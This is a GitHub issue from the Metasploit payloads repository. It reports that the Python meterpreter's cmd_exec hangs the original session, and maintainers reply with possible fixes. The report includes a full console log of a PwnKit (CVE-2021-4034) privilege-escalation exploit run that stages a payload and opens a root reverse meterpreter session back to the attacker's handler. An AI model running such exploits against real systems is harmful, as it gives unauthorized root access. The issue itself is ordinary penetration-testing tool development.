rapid7 / metasploit-payloads

Unified repository for different Metasploit Framework payloads

Python cmd_exec fails to background the process as expected #552

Open bwatters-r7 opened 2 years ago

bwatters-r7 commented 2 years ago

In testing the LPE here (https://github.com/rapid7/metasploit-framework/pull/16312) using a python payload, the exploit succeeds, but then timeout errors are generated. It appears to fail while crashing the original session. After turning on debugging and watching, what is happening is that the session freezes after the cmd_exec call. All commands after the cmd_exec fail with timeout errors. If you go back to the original (not root) session, all commands give a timeout error. If you go into the new root session, it works fine, and if you exit the new root session, then the original session becomes operative again. Example:

msf6 payload(python/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(python/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.101:6578 
[*] Sending stage (39920 bytes) to 10.5.132.108
[*] Meterpreter session 1 opened (10.5.135.101:6578 -> 10.5.132.108:46922 ) at 2022-03-08 18:29:21 -0600

msf6 payload(python/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : ubuntu-18041
OS              : Linux 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(python/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.105
[*] Determined host os is Ubuntu
[*] Polkit package version = 0.105-20ubuntu0.18.04.1
[*] Detected architecture: x86_64
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.lhaqxua
[*] /tmp/.lhaqxua created
[!] Verify cleanup of /tmp/.lhaqxua
[*] Running python3 /tmp/.lhaqxua/.qmnpurhmhd /usr/bin/pkexec /tmp/.lhaqxua/dhuyrf/dhuyrf.so dhuyrf tekeajpcudd
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “tekeajpcudd”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.
[+] The target is vulnerable.
[*] Detected architecture: x86_64
[*] Detected payload arch: x64
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.xlkdwwcadpyd
[*] /tmp/.xlkdwwcadpyd created
[*] Writing '/tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.xlkdwwcadpyd
[*] Running python3 /tmp/.xlkdwwcadpyd/.rqodmlcyrgsr /usr/bin/pkexec /tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so aagpbnlvb brxphinvsj
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.132.108
[+] Deleted /tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so
[+] Deleted /tmp/.xlkdwwcadpyd/.rqodmlcyrgsr
[+] Deleted /tmp/.xlkdwwcadpyd
[*] Meterpreter session 2 opened (10.5.135.101:4444 -> 10.5.132.108:39786 ) at 2022-03-08 18:30:10 -0600
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/.lhaqxua/.qmnpurhmhd: Operation timed out.

[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > 
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: meterpreter linux
        Info: msfuser @ ubuntu-18041
      Tunnel: 10.5.135.101:6578 -> 10.5.132.108:46922  (10.5.132.108)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-256-CBC)
        UUID: f36f2c5a2e1bd403/python=20/linux=6/2022-03-09T00:29:20Z
     CheckIn: 64s ago @ 2022-03-08 18:30:24 -0600
  Registered: No

  Session ID: 2
        Name: 
        Type: meterpreter linux
        Info: root @ 10.5.132.108
      Tunnel: 10.5.135.101:4444 -> 10.5.132.108:39786  (10.5.132.108)
         Via: exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
   Encrypted: Yes (AES-256-CBC)
        UUID: 59461ffc33ffa15f/x64=2/linux=6/2022-03-09T00:30:10Z
     CheckIn: 18s ago @ 2022-03-08 18:31:10 -0600
  Registered: No

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.132.108
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.5.132.108 - Meterpreter session 2 closed.  Reason: Died
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
[-] stdapi_fs_getwd: Operation failed: Python exception: FileNotFoundError
meterpreter > cd ~
meterpreter > sysinfo
Computer        : ubuntu-18041
OS              : Linux 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > 
adfoster-r7 commented 2 years ago

I haven't replicated this yet, but it resembles an issue Simon and I fixed within shell_to_meterpreter, which also used cmd_exec.

TL;DR There's now a new Channelize option on cmd_exec to specify that the process should be executed, but without waiting around to buffer the stdout/stderr output back to msfconsole. That might be a solution for this exploit as well 🤞

https://github.com/rapid7/metasploit-framework/pull/16369/files#diff-7de0108ace71efb370286b25c5148509e74235d2eb74d5f5f48fd6e4b755fa89R179
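The blocking behaviour described in this thread, as an added Python example (not code from the issue or from Metasploit): a cmd_exec-style call that holds a pipe to the launched process and reads it to EOF cannot return until every inherited copy of that pipe is closed, so it stays blocked for as long as a spawned child lives, which matches session 1 only recovering once the root session exits. `LAUNCHER` is a constructed stand-in for the helper that is launched; `exec_and_buffer` and `exec_detached` are hypothetical names for the two execution styles.

```python
import subprocess
import time

# Constructed stand-in for the launched helper: it spawns a long-lived
# child (playing the role of the stager that keeps the new session alive)
# and exits at once. The child inherits stdout/stderr from `sh`.
LAUNCHER = ["sh", "-c", "sleep 2 & echo launched"]


def exec_and_buffer(cmd):
    """cmd_exec-style execution: hold a pipe to the process and read it to
    EOF. EOF only arrives once *every* holder of the write end has closed,
    so the read blocks for as long as the inherited child lives, even
    though the launcher itself exited immediately.
    Returns (captured_output, seconds_blocked)."""
    start = time.monotonic()
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT)
    out, _ = proc.communicate()          # blocks until the pipe hits EOF
    return out.decode().strip(), time.monotonic() - start


def exec_detached(cmd):
    """Channelize/background-style execution: no pipe is held to the
    process, so nothing can block on its descendants. Only the launcher's
    own exit is awaited; the child keeps running in its own session.
    Returns (exit_code, seconds_blocked)."""
    start = time.monotonic()
    proc = subprocess.Popen(cmd, stdin=subprocess.DEVNULL,
                            stdout=subprocess.DEVNULL,
                            stderr=subprocess.DEVNULL,
                            start_new_session=True)  # own process group
    rc = proc.wait()                     # launcher exits right after echo
    return rc, time.monotonic() - start


if __name__ == "__main__":
    out, blocked = exec_and_buffer(LAUNCHER)
    print(f"buffered: got {out!r} after {blocked:.1f}s (waited on child)")
    rc, blocked = exec_detached(LAUNCHER)
    print(f"detached: exit {rc} after {blocked:.1f}s (child still running)")
```

The buffered variant returns "launched" only after the two-second child closes its copy of the pipe; the detached variant returns as soon as the launcher itself exits.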

bcoles commented 2 years ago

Similar issue with PowerShell sessions: https://github.com/rapid7/metasploit-framework/issues/9511. It is old now, though, and may have been patched.